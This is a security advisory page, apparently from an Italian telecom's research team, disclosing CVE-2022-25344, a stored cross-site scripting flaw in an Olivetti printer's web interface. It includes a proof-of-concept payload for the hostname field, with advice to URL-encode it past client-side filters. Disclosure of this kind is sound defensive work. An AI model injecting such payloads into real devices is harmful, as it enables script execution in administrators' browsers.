La Sostenibilità per TIM

Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

CVE-2022-25344

CVE-2022-25344 – Olivetti d-COLOR MF3555

Vulnerability Description: CWE-79: Cross-Site Scripting Stored
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25344
CVSv3: 6.1
Severity
: Medium
Credits:
 Mattia Campanelli, Luca Carbone, Massimiliano Brolli

An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The Web Application doesn't properly check parameters, sent in a /dvcset/sysset/set.cgi POST request via the arg01.Hostname field, before saving them on the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.

NOTE: This vulnerability has been fixed in the available firmware version 2XD_S000.002.703 from January 17th, 2022 and later versions.

Step-by-step instructions and PoC

The vulnerable functionality can be reached through the following actions:

  • Impostazioni Dispositivo > Sistema
    A PoC is possibile intercepting the POST request to /dvcset/sysset/set.cgi, after update the settings on the page.  Then we can insert the malicious string in the arg01.Hostname parameter:
  • <img src=# onerror=alert(1337)/>
    This payload needs to be URL encoded in order to bypass client-side security filters. Subsequently, we visit the /jobs page to spawn the Javascript malicious code.

Affected Endpoints

  • URL: /dvcset/sysset/set.cgi
  • HTTP Parameter: Host (arg01.Hostname)

Below are the evidences with the vulnerability details and the payloads used.

CVE-2022-25344-1

Figure 1: Administrative page to change the Host name

Click here to enlarge the image

CVE-2022-25344-2

Figure 2: The malicious payload will be URL encoded, to bypass the client-side filters

Click here to enlarge the image

CVE-2022-25344-3

Figure 3: /jobs page stored javascript code

Click here to enlarge the image